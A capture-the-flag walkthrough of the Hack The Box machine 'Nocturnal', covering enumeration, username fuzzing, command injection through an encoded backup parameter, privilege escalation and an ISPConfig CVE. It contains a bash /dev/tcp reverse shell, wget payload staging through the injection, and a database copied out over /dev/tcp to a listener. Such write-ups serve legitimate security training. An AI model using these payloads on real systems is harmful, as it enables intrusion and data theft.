HTB | Nocturnal

Machine - https://app.hackthebox.com/machines/Nocturnal

IP - 10.10.11.64

NMAP

└─$ nmap -sT -p- --min-rate 10000 10.10.11.64 -Pn -oA nmap_ports                                         
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-05-14 23:36 IST
Nmap scan report for 10.10.11.64
Host is up (0.80s latency).
Not shown: 65482 filtered tcp ports (no-response), 51 closed tcp ports (conn-refused)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 104.95 seconds
└─$ nmap -sC -sV -p 22,80 10.10.11.64 -Pn -oA nmap_ports_details
Starting Nmap 7.95 ( <https://nmap.org> ) at 2025-05-14 23:42 IST
Nmap scan report for 10.10.11.64
Host is up (0.30s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
|_  256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to <http://nocturnal.htb/>
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at <https://nmap.org/submit/> .
Nmap done: 1 IP address (1 host up) scanned in 29.00 seconds

Port 80

Directory search

└─$ dirsearch -u <http://nocturnal.htb/> -x 403,404

<--SNIP-->

Target: <http://nocturnal.htb/>

[23:52:55] Starting:                                                                                                                                                                                                                       
[23:54:03] 302 -    0B  - /admin.php  ->  login.php                         
[23:54:39] 301 -  178B  - /backups  ->  <http://nocturnal.htb/backups/>       
[23:54:58] 302 -    0B  - /dashboard.php  ->  login.php                     
[23:55:38] 200 -  644B  - /login.php                                        
[23:55:40] 302 -    0B  - /logout.php  ->  login.php                        
[23:56:21] 200 -  649B  - /register.php                                     
[23:57:01] 302 -    3KB - /view.php  ->  login.php                          
                                                                             
Task Completed

Let’s create an account and look further into the website

Foothold/shell

After creating an account test:test we were redirected to dashboard, where we can see there is functionality to upload files is there

Upon trying to upload a text file, we get the error Invalid file type. pdf, doc, docx, xls, xlsx, odt are allowed.

We were able to upload the test.pdf file, we have seen /view.php endpoint on our dirsearch.

Let’s visit that endpoint,

look like we will need to modify the URL

On our upload page we found the link to our file http://nocturnal.htb/view.php?username=test&file=test.pdf

fuzzing username

If the user name is obtained through the URL , you can enumerate the users here.


└─$ ffuf -u '<http://nocturnal.htb/view.php?username=FUZZ&file=test.pdf>' -H 'Cookie: PHPSESSID=cp1p13o4js9gtnbv448l899c1g' -w /usr/share/seclists/Usernames/Names/names.txt -fs 2985

We have found 3 users admin, amanda and tobias

It can be seen that these users have special echoes. When checking the files of amanda , we found a privacy.odt

priacy.odt

it is a document file

Let’s open and analyze the content

found amanda’s password

admin panel

we can login as amanda

and we can visit admin panel

On intercepting create backup request, we can see password and backup parameter.

Use %0a for line breaks and %09 for spaces to execute the command.

On trying bash commands in password parameter we were able to execute id command

password=bash%09-c%09"id"%0A&backup=

shell as www-data

When trying to execute revshell i was getting errors

So i uploaded the revshell on the box and run it

└─$ cat shell             
bash -i >& /dev/tcp/10.10.16.7/1234 0>&1
password=%0Abash%09-c%09"wget%0910.10.16.7/shell"%0A&backup=
password=%0Abash%09-c%09"bash%09shell"%0A&backup=

shell as tobias

nocturnal_database.db.db

We found a DB file

www-data@nocturnal:~/nocturnal_database$ ls
ls
nocturnal_database.db

Let’s copy this

//on box
www-data@nocturnal:~/nocturnal_database$ cat nocturnal_database.db > /dev/tcp/10.10.16.7/4444
<at nocturnal_database.db > /dev/tcp/10.10.16.7/4444
www-data@nocturnal:~/nocturnal_database$ 

//on kali
└─$ nc -nlvp 4444 > nocturnal_database.db
listening on [any] 4444 ...
connect to [10.10.16.7] from (UNKNOWN) [10.10.11.64] 41470
                                                                                                                                                                                                                                            
┌──(anurag㉿anurag)-[~/htb/Nocturnal]
└─$ file nocturnal_database.db
nocturnal_database.db: SQLite 3.x database, last written using SQLite version 3031001, file counter 19, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 19

There was a users table in the db, from which we get the hased passwords

found tobias password

And we are in as tobias, and we also found the user.txt

Privilege Escalation

port 8080

something is hosted internally on port 8080

Let’s start a new SSH with local port forwarding

└─$ ssh tobias@10.10.11.64 -L 9090:127.0.0.1:8080

Let’s login via admin: <toba password>

Found the version

CVE 2023-46818

On googling the exploit for ISPConfig 3.2 , we found CVE-2023-46818 and this exploit

and we are in as root

found root.txt

PreviousHTB | DogNextHTB | Artificial

Last updated